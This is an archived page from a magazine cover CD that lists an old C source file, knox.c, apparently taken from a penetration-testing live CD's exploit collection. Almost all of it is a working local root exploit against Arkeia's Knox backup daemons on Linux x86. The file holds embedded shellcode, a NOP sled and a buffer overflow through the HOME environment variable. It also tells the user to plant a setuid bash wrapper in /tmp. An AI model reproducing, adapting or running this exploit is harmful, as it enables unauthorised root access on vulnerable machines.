Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / knox.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 85 lines

/* * nlservd/rnavc local root exploit for Linux x86 tested on SuSE 6.2 * exploits Arkiea's Knox backup package. * gcc -o knox knox.c * ./knox <offset> <buflen> * * * NOTE: you *MUST* have void main(){setuid(geteuid()); system("/bin/bash");} * compiled in /tmp/ui for this to work. * * To exploit rnavc, simply change the execl call to ("/usr/bin/knox/rnavc", * "rnavc", NULL) * -Brock Tellier btellier@webley.com */ #include <stdlib.h> #include <stdio.h> char exec[]= /* Generic Linux x86 running our /tmp program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/ui"; #define LEN 2000 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=2800; buflen=1200; } addr=get_sp(); fprintf(stderr, "Arkiea Knox backup package exploit\n"); fprintf(stderr, "For nlservd and rnavc\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),exec,strlen(exec)); for(i=((buflen/2) + strlen(exec))+3;i<buflen-4;i+=4) *(int *)&buf[i]=addr+offset; setenv("HOME", buf, 1); execl("/usr/knox/bin/nlservd", "nlservd", NULL); }